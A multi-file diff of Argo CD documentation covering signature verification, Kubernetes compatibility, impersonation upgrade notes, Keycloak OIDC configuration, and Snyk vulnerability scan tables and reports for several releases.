# Verification of Argo CD Artifacts
## Prerequisites
- cosign `v2.0.0` or higher [installation instructions](https://docs.sigstore.dev/cosign/system_config/installation/)
- cosign `v2.0.0` or higher [installation instructions](https://docs.sigstore.dev/cosign/installation)
- slsa-verifier [installation instructions](https://github.com/slsa-framework/slsa-verifier#installation)
- crane [installation instructions](https://github.com/google/go-containerregistry/blob/main/cmd/crane/README.md) (for container verification only)
@@ -154,4 +154,4 @@ slsa-verifier verify-artifact sbom.tar.gz \
> [!NOTE]
> We encourage all users to verify signatures and provenances with your admission/policy controller of choice. Doing so will verify that an image was built by us before it's deployed on your Kubernetes cluster.
Cosign signatures and SLSA provenances are compatible with several types of admission controllers. Please see the [cosign documentation](https://docs.sigstore.dev/policy-controller/overview/) and [slsa-github-generator](https://github.com/slsa-framework/slsa-github-generator/blob/main/internal/builders/container/README.md#verification) for supported controllers.
Cosign signatures and SLSA provenances are compatible with several types of admission controllers. Please see the [cosign documentation](https://docs.sigstore.dev/cosign/overview/#kubernetes-integrations) and [slsa-github-generator](https://github.com/slsa-framework/slsa-github-generator/blob/main/internal/builders/container/README.md#verification) for supported controllers.

View File

@@ -1,2 +1,5 @@
This page is populated for released Argo CD versions. Use the version selector to view this table for a specific
version.
| Argo CD version | Kubernetes versions |
|-----------------|---------------------|
| 3.4 | v1.35, v1.34, v1.33, v1.32 |
| 3.3 | v1.35, v1.34, v1.33, v1.32 |
| 3.2 | v1.34, v1.33, v1.32, v1.31 |

View File

@@ -1,40 +0,0 @@
# v3.4 to 3.5
## Breaking Changes
## Behavioral Improvements / Fixes
### Impersonation extended to server operations
When [impersonation](../app-sync-using-impersonation.md) is enabled, it now applies to all API server operations, not just sync operations. This means that actions triggered through the UI or API (viewing logs, listing events, deleting resources, running resource actions, etc.) will use the impersonated service account derived from the AppProject's `destinationServiceAccounts` configuration.
Previously, impersonation only applied to sync operations.
**Affected operations and required permissions:**
| Operation | Kubernetes API call | Required RBAC verbs |
|---|---|---|
| Get resource | `GET` on the target resource | `get` |
| Patch resource | `PATCH` on the target resource | `get`, `patch` |
| Delete resource | `DELETE` on the target resource | `delete` |
| List resource events | `LIST` on `events` (core/v1) | `list` |
| View pod logs | `GET` on `pods` and `pods/log` | `get` |
| Run resource action | `GET`, `CREATE`, `PATCH` on the target resource | `get`, `create`, `patch` |
This list covers built-in operations. Custom resource actions may require additional permissions depending on what Kubernetes API calls they make.
Users with impersonation enabled must ensure the service accounts configured in `destinationServiceAccounts` have permissions for these operations.
No action is required for users who do not have impersonation enabled.
## API Changes
## Security Changes
## Deprecated Items
## Kustomize Upgraded
## Helm Upgraded
## Custom Healthchecks Added

View File

@@ -39,7 +39,6 @@ kubectl apply -n argocd --server-side --force-conflicts -f https://raw.githubuse
<hr/>
- [v3.4 to v3.5](./3.4-3.5.md)
- [v3.3 to v3.4](./3.3-3.4.md)
- [v3.2 to v3.3](./3.2-3.3.md)
- [v3.1 to v3.2](./3.1-3.2.md)

View File

@@ -1,21 +1,21 @@
# Keycloak
Keycloak and Argo CD integration can be configured in two ways with Client authentication and with PKCE.
Keycloak and ArgoCD integration can be configured in two ways with Client authentication and with PKCE.
If you need to authenticate with __argo-cd command line__, you must choose PKCE way.
* [Keycloak and Argo CD with Client authentication](#keycloak-and-argocd-with-client-authentication)
* [Keycloak and Argo CD with PKCE](#keycloak-and-argocd-with-pkce)
* [Keycloak and ArgoCD with Client authentication](#keycloak-and-argocd-with-client-authentication)
* [Keycloak and ArgoCD with PKCE](#keycloak-and-argocd-with-pkce)
## Keycloak and Argo CD with Client authentication
## Keycloak and ArgoCD with Client authentication
These instructions will take you through the entire process of getting your Argo CD application to authenticate with Keycloak.
These instructions will take you through the entire process of getting your ArgoCD application authenticating with Keycloak.
Start by creating a client within Keycloak and configure Argo CD to use Keycloak for authentication, using groups set in Keycloak
You will create a client within Keycloak and configure ArgoCD to use Keycloak for authentication, using groups set in Keycloak
to determine privileges in Argo.
### Creating a new client in Keycloak
First, setup a new client.
First we need to setup a new client.
Start by logging into your keycloak server, select the realm you want to use (`master` by default)
and then go to __Clients__ and click the __Create client__ button at the top.
@@ -37,11 +37,11 @@ but it's not recommended in production).
Make sure to click __Save__.
There should be a tab called __Credentials__. You can copy the Client Secret that we'll use in our Argo CD configuration.
There should be a tab called __Credentials__. You can copy the Client Secret that we'll use in our ArgoCD configuration.
![Keycloak client secret](../../assets/keycloak-client-secret.png "Keycloak client secret")
### Configuring Argo CD OIDC
### Configuring ArgoCD OIDC
Let's start by storing the client secret you generated earlier in the argocd secret _argocd-secret_.
@@ -68,7 +68,7 @@ data:
clientID: argocd
clientSecret: $oidc.keycloak.clientSecret
refreshTokenThreshold: 2m
requestedScopes: ["openid", "profile", "email", "groups", "offline_access"]
requestedScopes: ["openid", "profile", "email", "groups"]
```
Make sure that:
@@ -80,18 +80,18 @@ Make sure that:
- __requestedScopes__ contains the _groups_ claim if you didn't add it to the Default scopes
- __refreshTokenThreshold__ is less than the client token lifetime. If this setting is not less than the token lifetime, a new token will be obtained for every request. Keycloak sets the client token lifetime to 5 minutes by default.
## Keycloak and Argo CD with PKCE
## Keycloak and ArgoCD with PKCE
These instructions will take you through the entire process of getting your Argo CD application authenticating with Keycloak.
These instructions will take you through the entire process of getting your ArgoCD application authenticating with Keycloak.
You will create a client within Keycloak and configure Argo CD to use Keycloak for authentication, using groups set in Keycloak
You will create a client within Keycloak and configure ArgoCD to use Keycloak for authentication, using groups set in Keycloak
to determine privileges in Argo.
You will also be able to authenticate using argo-cd command line.
### Creating a new client in Keycloak
First, setup a new client.
First we need to setup a new client.
Start by logging into your keycloak server, select the realm you want to use (`master` by default)
and then go to __Clients__ and click the __Create client__ button at the top.
@@ -119,7 +119,7 @@ Now go to a tab called __Advanced__, look for parameter named __Proof Key for Co
![Keycloak configure client Step 2](../../assets/keycloak-configure-client-pkce_2.png "Keycloak configure client Step 2")
Make sure to click __Save__.
### Configuring Argo CD OIDC
### Configuring ArgoCD OIDC
Now we can configure the config map and add the oidc configuration to enable our keycloak authentication.
You can use `$ kubectl edit configmap argocd-cm`.
@@ -138,7 +138,7 @@ data:
clientID: argocd
enablePKCEAuthentication: true
refreshTokenThreshold: 2m
requestedScopes: ["openid", "profile", "email", "groups", "offline_access"]
requestedScopes: ["openid", "profile", "email", "groups"]
```
Make sure that:
@@ -146,13 +146,13 @@ Make sure that:
- __issuer__ ends with the correct realm (in this example _master_)
- __issuer__ on Keycloak releases older than version 17 the URL must include /auth (in this example /auth/realms/master)
- __clientID__ is set to the Client ID you configured in Keycloak
- __enablePKCEAuthentication__ must be set to true to enable correct Argo CD behaviour with PKCE
- __enablePKCEAuthentication__ must be set to true to enable correct ArgoCD behaviour with PKCE
- __requestedScopes__ contains the _groups_ claim if you didn't add it to the Default scopes
- __refreshTokenThreshold__ is less than the client token lifetime. If this setting is not less than the token lifetime, a new token will be obtained for every request. Keycloak sets the client token lifetime to 5 minutes by default.
## Configuring the groups claim
In order for Argo CD to provide the groups the user is in we need to configure a groups claim that can be included in the authentication token.
In order for ArgoCD to provide the groups the user is in we need to configure a groups claim that can be included in the authentication token.
To do this we'll start by creating a new __Client Scope__ called _groups_.
@@ -174,7 +174,7 @@ Go back to the client we've created earlier and go to the Tab "Client Scopes".
Click on "Add client scope", choose the _groups_ scope and add it either to the __Default__ or to the __Optional__ Client Scope.
If you put it in the Optional
category you will need to make sure that Argo CD requests the scope in its OIDC configuration.
category you will need to make sure that ArgoCD requests the scope in its OIDC configuration.
Since we will always want group information, I recommend
using the Default category.
@@ -184,7 +184,7 @@ Create a group called _ArgoCDAdmins_ and have your current user join the group.
![Keycloak user group](../../assets/keycloak-user-group.png "Keycloak user group")
## Configuring Argo CD Policy
## Configuring ArgoCD Policy
Now that we have an authentication that provides groups we want to apply a policy to these groups.
We can modify the _argocd-rbac-cm_ ConfigMap using `$ kubectl edit configmap argocd-rbac-cm`.
@@ -205,7 +205,7 @@ In this example we give the role _role:admin_ to all users in the group _ArgoCDA
You can now login using our new Keycloak OIDC authentication:
![Keycloak Argo CD login](../../assets/keycloak-login.png "Keycloak Argo CD login")
![Keycloak ArgoCD login](../../assets/keycloak-login.png "Keycloak ArgoCD login")
If you have used PKCE method, you can also authenticate using command line:
```bash
@@ -219,7 +219,7 @@ Once done, you should see
![Authentication successful!](../../assets/keycloak-authentication-successful.png "Authentication successful!")
## Troubleshoot
If Argo CD auth returns 401 or when the login attempt leads to the loop, then restart the argocd-server pod.
If ArgoCD auth returns 401 or when the login attempt leads to the loop, then restart the argocd-server pod.
```
kubectl rollout restart deployment argocd-server -n argocd
```

View File

@@ -13,71 +13,52 @@ recent minor releases.
| | Critical | High | Medium | Low |
|---:|:--------:|:----:|:------:|:---:|
| [gitops-engine/go.mod](master/argocd-test.html) | 0 | 2 | 4 | 0 |
| [go.mod](master/argocd-test.html) | 0 | 2 | 12 | 0 |
| [hack/get-previous-release/go.mod](master/argocd-test.html) | 0 | 0 | 1 | 0 |
| [ui/yarn.lock](master/argocd-test.html) | 0 | 9 | 10 | 2 |
| [dex:v2.45.0](master/ghcr.io_dexidp_dex_v2.45.0.html) | 0 | 0 | 1 | 0 |
| [gitops-engine/go.mod](master/argocd-test.html) | 0 | 0 | 2 | 0 |
| [go.mod](master/argocd-test.html) | 0 | 0 | 6 | 0 |
| [ui/yarn.lock](master/argocd-test.html) | 0 | 4 | 5 | 2 |
| [dex:v2.45.0](master/ghcr.io_dexidp_dex_v2.45.0.html) | 1 | 0 | 1 | 0 |
| [haproxy:3.0.8-alpine](master/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.3-alpine](master/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
| [argocd:latest](master/quay.io_argoproj_argocd_latest.html) | 0 | 0 | 6 | 4 |
| [argocd:latest](master/quay.io_argoproj_argocd_latest.html) | 0 | 0 | 9 | 10 |
| [install.yaml](master/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](master/argocd-iac-namespace-install.html) | - | - | - | - |
### v3.4.0-rc4
### v3.3.2
| | Critical | High | Medium | Low |
|---:|:--------:|:----:|:------:|:---:|
| [gitops-engine/go.mod](v3.4.0-rc4/argocd-test.html) | 0 | 2 | 4 | 0 |
| [go.mod](v3.4.0-rc4/argocd-test.html) | 0 | 6 | 14 | 0 |
| [hack/get-previous-release/go.mod](v3.4.0-rc4/argocd-test.html) | 0 | 0 | 1 | 0 |
| [ui/yarn.lock](v3.4.0-rc4/argocd-test.html) | 0 | 9 | 11 | 2 |
| [dex:v2.45.0](v3.4.0-rc4/ghcr.io_dexidp_dex_v2.45.0.html) | 0 | 0 | 1 | 0 |
| [haproxy:3.0.8-alpine](v3.4.0-rc4/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.3-alpine](v3.4.0-rc4/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
| [argocd:v3.4.0-rc3](v3.4.0-rc4/quay.io_argoproj_argocd_v3.4.0-rc3.html) | 0 | 0 | 6 | 4 |
| [install.yaml](v3.4.0-rc4/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.4.0-rc4/argocd-iac-namespace-install.html) | - | - | - | - |
| [gitops-engine/go.mod](v3.3.2/argocd-test.html) | 0 | 0 | 2 | 0 |
| [go.mod](v3.3.2/argocd-test.html) | 0 | 1 | 6 | 0 |
| [ui/yarn.lock](v3.3.2/argocd-test.html) | 0 | 6 | 7 | 2 |
| [dex:v2.43.0](v3.3.2/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.3.2/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.3-alpine](v3.3.2/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
| [argocd:v3.3.2](v3.3.2/quay.io_argoproj_argocd_v3.3.2.html) | 0 | 0 | 9 | 12 |
| [install.yaml](v3.3.2/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.3.2/argocd-iac-namespace-install.html) | - | - | - | - |
### v3.3.6
### v3.2.7
| | Critical | High | Medium | Low |
|---:|:--------:|:----:|:------:|:---:|
| [gitops-engine/go.mod](v3.3.6/argocd-test.html) | 0 | 2 | 5 | 1 |
| [go.mod](v3.3.6/argocd-test.html) | 0 | 4 | 13 | 1 |
| [hack/get-previous-release/go.mod](v3.3.6/argocd-test.html) | 0 | 0 | 1 | 0 |
| [ui/yarn.lock](v3.3.6/argocd-test.html) | 0 | 11 | 13 | 2 |
| [dex:v2.43.0](v3.3.6/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.3.6/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.3-alpine](v3.3.6/public.ecr.aws_docker_library_redis_8.2.3-alpine.html) | 0 | 0 | 0 | 0 |
| [argocd:v3.3.6](v3.3.6/quay.io_argoproj_argocd_v3.3.6.html) | 0 | 0 | 6 | 6 |
| [install.yaml](v3.3.6/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.3.6/argocd-iac-namespace-install.html) | - | - | - | - |
| [go.mod](v3.2.7/argocd-test.html) | 0 | 1 | 6 | 0 |
| [ui/yarn.lock](v3.2.7/argocd-test.html) | 0 | 6 | 9 | 2 |
| [dex:v2.43.0](v3.2.7/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.2.7/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.2-alpine](v3.2.7/public.ecr.aws_docker_library_redis_8.2.2-alpine.html) | 0 | 1 | 0 | 13 |
| [argocd:v3.2.7](v3.2.7/quay.io_argoproj_argocd_v3.2.7.html) | 0 | 0 | 0 | 1 |
| [install.yaml](v3.2.7/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.2.7/argocd-iac-namespace-install.html) | - | - | - | - |
### v3.2.8
### v3.1.12
| | Critical | High | Medium | Low |
|---:|:--------:|:----:|:------:|:---:|
| [go.mod](v3.2.8/argocd-test.html) | 1 | 5 | 13 | 1 |
| [hack/get-previous-release/go.mod](v3.2.8/argocd-test.html) | 0 | 0 | 1 | 0 |
| [ui/yarn.lock](v3.2.8/argocd-test.html) | 0 | 11 | 15 | 2 |
| [dex:v2.43.0](v3.2.8/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.2.8/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:8.2.2-alpine](v3.2.8/public.ecr.aws_docker_library_redis_8.2.2-alpine.html) | 0 | 1 | 0 | 13 |
| [argocd:v3.2.8](v3.2.8/quay.io_argoproj_argocd_v3.2.8.html) | 0 | 0 | 0 | 1 |
| [install.yaml](v3.2.8/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.2.8/argocd-iac-namespace-install.html) | - | - | - | - |
### v3.1.13
| | Critical | High | Medium | Low |
|---:|:--------:|:----:|:------:|:---:|
| [go.mod](v3.1.13/argocd-test.html) | 1 | 3 | 12 | 0 |
| [hack/get-previous-release/go.mod](v3.1.13/argocd-test.html) | 0 | 0 | 1 | 0 |
| [ui/yarn.lock](v3.1.13/argocd-test.html) | 1 | 11 | 13 | 2 |
| [dex:v2.43.0](v3.1.13/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.1.13/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:7.2.11-alpine](v3.1.13/public.ecr.aws_docker_library_redis_7.2.11-alpine.html) | 0 | 1 | 0 | 11 |
| [argocd:v3.1.13](v3.1.13/quay.io_argoproj_argocd_v3.1.13.html) | 0 | 0 | 7 | 7 |
| [install.yaml](v3.1.13/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.1.13/argocd-iac-namespace-install.html) | - | - | - | - |
| [go.mod](v3.1.12/argocd-test.html) | 0 | 1 | 6 | 0 |
| [ui/yarn.lock](v3.1.12/argocd-test.html) | 1 | 6 | 9 | 2 |
| [dex:v2.43.0](v3.1.12/ghcr.io_dexidp_dex_v2.43.0.html) | 0 | 1 | 0 | 14 |
| [haproxy:3.0.8-alpine](v3.1.12/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html) | 0 | 1 | 0 | 14 |
| [redis:7.2.11-alpine](v3.1.12/public.ecr.aws_docker_library_redis_7.2.11-alpine.html) | 0 | 1 | 0 | 11 |
| [argocd:v3.1.12](v3.1.12/quay.io_argoproj_argocd_v3.1.12.html) | 0 | 0 | 18 | 27 |
| [install.yaml](v3.1.12/argocd-iac-install.html) | - | - | - | - |
| [namespace-install.yaml](v3.1.12/argocd-iac-namespace-install.html) | - | - | - | - |

View File

@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:36:21 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:30:29 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>
@@ -881,7 +881,7 @@
</li>
<li class="card__meta__item">
Line number: 32111
Line number: 32104
</li>
</ul>
@@ -933,7 +933,7 @@
</li>
<li class="card__meta__item">
Line number: 32466
Line number: 32459
</li>
</ul>
@@ -1049,7 +1049,7 @@
</li>
<li class="card__meta__item">
Line number: 31901
Line number: 31900
</li>
</ul>
@@ -1165,7 +1165,7 @@
</li>
<li class="card__meta__item">
Line number: 31963
Line number: 31962
</li>
</ul>
@@ -1223,7 +1223,7 @@
</li>
<li class="card__meta__item">
Line number: 32082
Line number: 32075
</li>
</ul>
@@ -1281,7 +1281,7 @@
</li>
<li class="card__meta__item">
Line number: 32106
Line number: 32099
</li>
</ul>
@@ -1339,7 +1339,7 @@
</li>
<li class="card__meta__item">
Line number: 32466
Line number: 32459
</li>
</ul>
@@ -1397,7 +1397,7 @@
</li>
<li class="card__meta__item">
Line number: 32165
Line number: 32158
</li>
</ul>
@@ -1455,7 +1455,7 @@
</li>
<li class="card__meta__item">
Line number: 32561
Line number: 32554
</li>
</ul>
@@ -1513,7 +1513,7 @@
</li>
<li class="card__meta__item">
Line number: 33025
Line number: 33012
</li>
</ul>
@@ -1721,7 +1721,7 @@
</li>
<li class="card__meta__item">
Line number: 32082
Line number: 32075
</li>
</ul>
@@ -1895,7 +1895,7 @@
</li>
<li class="card__meta__item">
Line number: 31901
Line number: 31900
</li>
</ul>
@@ -1953,7 +1953,7 @@
</li>
<li class="card__meta__item">
Line number: 31963
Line number: 31962
</li>
</ul>
@@ -2011,7 +2011,7 @@
</li>
<li class="card__meta__item">
Line number: 32082
Line number: 32075
</li>
</ul>
@@ -2069,7 +2069,7 @@
</li>
<li class="card__meta__item">
Line number: 32106
Line number: 32099
</li>
</ul>
@@ -2127,7 +2127,7 @@
</li>
<li class="card__meta__item">
Line number: 32466
Line number: 32459
</li>
</ul>
@@ -2185,7 +2185,7 @@
</li>
<li class="card__meta__item">
Line number: 32165
Line number: 32158
</li>
</ul>
@@ -2243,7 +2243,7 @@
</li>
<li class="card__meta__item">
Line number: 32561
Line number: 32554
</li>
</ul>
@@ -2301,7 +2301,7 @@
</li>
<li class="card__meta__item">
Line number: 33025
Line number: 33012
</li>
</ul>
@@ -2413,7 +2413,7 @@
</li>
<li class="card__meta__item">
Line number: 31909
Line number: 31908
</li>
</ul>
@@ -2469,7 +2469,7 @@
</li>
<li class="card__meta__item">
Line number: 31890
Line number: 31883
</li>
</ul>
@@ -2525,7 +2525,7 @@
</li>
<li class="card__meta__item">
Line number: 32014
Line number: 32007
</li>
</ul>
@@ -2581,7 +2581,7 @@
</li>
<li class="card__meta__item">
Line number: 32099
Line number: 32092
</li>
</ul>
@@ -2637,7 +2637,7 @@
</li>
<li class="card__meta__item">
Line number: 32113
Line number: 32106
</li>
</ul>
@@ -2693,7 +2693,7 @@
</li>
<li class="card__meta__item">
Line number: 32474
Line number: 32467
</li>
</ul>
@@ -2749,7 +2749,7 @@
</li>
<li class="card__meta__item">
Line number: 32439
Line number: 32432
</li>
</ul>
@@ -2805,7 +2805,7 @@
</li>
<li class="card__meta__item">
Line number: 32924
Line number: 32911
</li>
</ul>
@@ -2861,7 +2861,7 @@
</li>
<li class="card__meta__item">
Line number: 33348
Line number: 33335
</li>
</ul>

View File

@@ -456,7 +456,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:36:31 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:30:39 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following path:</span>
@@ -835,7 +835,7 @@
</li>
<li class="card__meta__item">
Line number: 1358
Line number: 1351
</li>
</ul>
@@ -887,7 +887,7 @@
</li>
<li class="card__meta__item">
Line number: 1713
Line number: 1706
</li>
</ul>
@@ -1003,7 +1003,7 @@
</li>
<li class="card__meta__item">
Line number: 1148
Line number: 1147
</li>
</ul>
@@ -1119,7 +1119,7 @@
</li>
<li class="card__meta__item">
Line number: 1210
Line number: 1209
</li>
</ul>
@@ -1177,7 +1177,7 @@
</li>
<li class="card__meta__item">
Line number: 1329
Line number: 1322
</li>
</ul>
@@ -1235,7 +1235,7 @@
</li>
<li class="card__meta__item">
Line number: 1353
Line number: 1346
</li>
</ul>
@@ -1293,7 +1293,7 @@
</li>
<li class="card__meta__item">
Line number: 1713
Line number: 1706
</li>
</ul>
@@ -1351,7 +1351,7 @@
</li>
<li class="card__meta__item">
Line number: 1412
Line number: 1405
</li>
</ul>
@@ -1409,7 +1409,7 @@
</li>
<li class="card__meta__item">
Line number: 1808
Line number: 1801
</li>
</ul>
@@ -1467,7 +1467,7 @@
</li>
<li class="card__meta__item">
Line number: 2272
Line number: 2259
</li>
</ul>
@@ -1675,7 +1675,7 @@
</li>
<li class="card__meta__item">
Line number: 1329
Line number: 1322
</li>
</ul>
@@ -1849,7 +1849,7 @@
</li>
<li class="card__meta__item">
Line number: 1148
Line number: 1147
</li>
</ul>
@@ -1907,7 +1907,7 @@
</li>
<li class="card__meta__item">
Line number: 1210
Line number: 1209
</li>
</ul>
@@ -1965,7 +1965,7 @@
</li>
<li class="card__meta__item">
Line number: 1329
Line number: 1322
</li>
</ul>
@@ -2023,7 +2023,7 @@
</li>
<li class="card__meta__item">
Line number: 1353
Line number: 1346
</li>
</ul>
@@ -2081,7 +2081,7 @@
</li>
<li class="card__meta__item">
Line number: 1713
Line number: 1706
</li>
</ul>
@@ -2139,7 +2139,7 @@
</li>
<li class="card__meta__item">
Line number: 1412
Line number: 1405
</li>
</ul>
@@ -2197,7 +2197,7 @@
</li>
<li class="card__meta__item">
Line number: 1808
Line number: 1801
</li>
</ul>
@@ -2255,7 +2255,7 @@
</li>
<li class="card__meta__item">
Line number: 2272
Line number: 2259
</li>
</ul>
@@ -2367,7 +2367,7 @@
</li>
<li class="card__meta__item">
Line number: 1156
Line number: 1155
</li>
</ul>
@@ -2423,7 +2423,7 @@
</li>
<li class="card__meta__item">
Line number: 1137
Line number: 1130
</li>
</ul>
@@ -2479,7 +2479,7 @@
</li>
<li class="card__meta__item">
Line number: 1261
Line number: 1254
</li>
</ul>
@@ -2535,7 +2535,7 @@
</li>
<li class="card__meta__item">
Line number: 1346
Line number: 1339
</li>
</ul>
@@ -2591,7 +2591,7 @@
</li>
<li class="card__meta__item">
Line number: 1360
Line number: 1353
</li>
</ul>
@@ -2647,7 +2647,7 @@
</li>
<li class="card__meta__item">
Line number: 1721
Line number: 1714
</li>
</ul>
@@ -2703,7 +2703,7 @@
</li>
<li class="card__meta__item">
Line number: 1686
Line number: 1679
</li>
</ul>
@@ -2759,7 +2759,7 @@
</li>
<li class="card__meta__item">
Line number: 2171
Line number: 2158
</li>
</ul>
@@ -2815,7 +2815,7 @@
</li>
<li class="card__meta__item">
Line number: 2595
Line number: 2582
</li>
</ul>

File diff suppressed because it is too large Load Diff

View File

@@ -7,7 +7,7 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Snyk test report</title>
<meta name="description" content="31 known vulnerabilities found in 50 vulnerable dependency paths.">
<meta name="description" content="27 known vulnerabilities found in 46 vulnerable dependency paths.">
<base target="_blank">
<link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
sizes="194x194">
@@ -492,7 +492,7 @@
<div class="header-wrap">
<h1 class="project__header__title">Snyk test report</h1>
<p class="timestamp">April 5th 2026, 12:34:09 am (UTC+00:00)</p>
<p class="timestamp">March 8th 2026, 12:28:16 am (UTC+00:00)</p>
</div>
<div class="source-panel">
<span>Scanned the following paths:</span>
@@ -505,9 +505,9 @@
</div>
<div class="meta-counts">
<div class="meta-count"><span>31</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>50 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1192</span> <span>dependencies</span></div>
<div class="meta-count"><span>27</span> <span>known vulnerabilities</span></div>
<div class="meta-count"><span>46 vulnerable dependency paths</span></div>
<div class="meta-count"><span>1189</span> <span>dependencies</span></div>
</div><!-- .meta-counts -->
</div><!-- .layout-container--short -->
</header><!-- .project__header -->
@@ -516,7 +516,7 @@
<div class="layout-container" style="padding-top: 35px;">
<div class="cards--vuln filter--patch filter--ignore">
<div class="card card--vuln disclosure--not-new severity--critical" data-snyk-test="critical">
<h2 class="card__title">Incorrect Authorization</h2>
<h2 class="card__title">Out-of-bounds Write</h2>
<div class="card__section">
<div class="card__labels">
@@ -532,20 +532,17 @@
<ul class="card__meta">
<li class="card__meta__item">
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow"></span> /usr/local/bin/gomplate
</li>
<li class="card__meta__item">
Package Manager: golang
Package Manager: alpine:3.23
</li>
<li class="card__meta__item">
Vulnerable module:
google.golang.org/grpc
zlib/zlib
</li>
<li class="card__meta__item">Introduced through:
github.com/hairyhenderson/gomplate/v5@* and google.golang.org/grpc@v1.77.0
docker-image|ghcr.io/dexidp/dex@v2.45.0 and zlib/zlib@1.3.1-r2
</li>
</ul>
@@ -558,18 +555,33 @@
<ul class="card__meta__paths">
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/hairyhenderson/gomplate/v5@*
docker-image|ghcr.io/dexidp/dex@v2.45.0
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.77.0
zlib/zlib@1.3.1-r2
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
github.com/dexidp/dex@*
docker-image|ghcr.io/dexidp/dex@v2.45.0
<span class="list-paths__item__arrow"></span>
google.golang.org/grpc@v1.79.1
apk-tools/apk-tools@3.0.3-r1
<span class="list-paths__item__arrow"></span>
zlib/zlib@1.3.1-r2
</span>
</li>
<li>
<span class="list-paths__item__introduced"><em>Introduced through</em>:
docker-image|ghcr.io/dexidp/dex@v2.45.0
<span class="list-paths__item__arrow"></span>
apk-tools/apk-tools@3.0.3-r1
<span class="list-paths__item__arrow"></span>
apk-tools/libapk@3.0.3-r1
<span class="list-paths__item__arrow"></span>
zlib/zlib@1.3.1-r2
</span>
@@ -580,21 +592,25 @@
<hr/>
<!-- Overview -->
<h2 id="overview">Overview</h2>
<p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
<h2 id="workaround">Workaround</h2>
<p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
<h2 id="nvd-description">NVD Description</h2>
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>zlib</code> package and not the <code>zlib</code> package as distributed by <code>Alpine</code>.</em>
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
<p>zlib versions up to and including 1.3.1.2 include a global buffer overflow in the untgz utility located under contrib/untgz. The vulnerability is limited to the standalone demonstration utility and does not affect the core zlib compression library. The flaw occurs when a user executes the untgz command with an excessively long archive name supplied via the command line, leading to an out-of-bounds write in a fixed-size global buffer.</p>
<h2 id="remediation">Remediation</h2>
<p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
<p>Upgrade <code>Alpine:3.23</code> <code>zlib</code> to version 1.3.2-r0 or higher.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
<li><a href="https://github.com/madler/zlib">https://github.com/madler/zlib</a></li>
<li><a href="https://seclists.org/fulldisclosure/2026/Jan/3">https://seclists.org/fulldisclosure/2026/Jan/3</a></li>
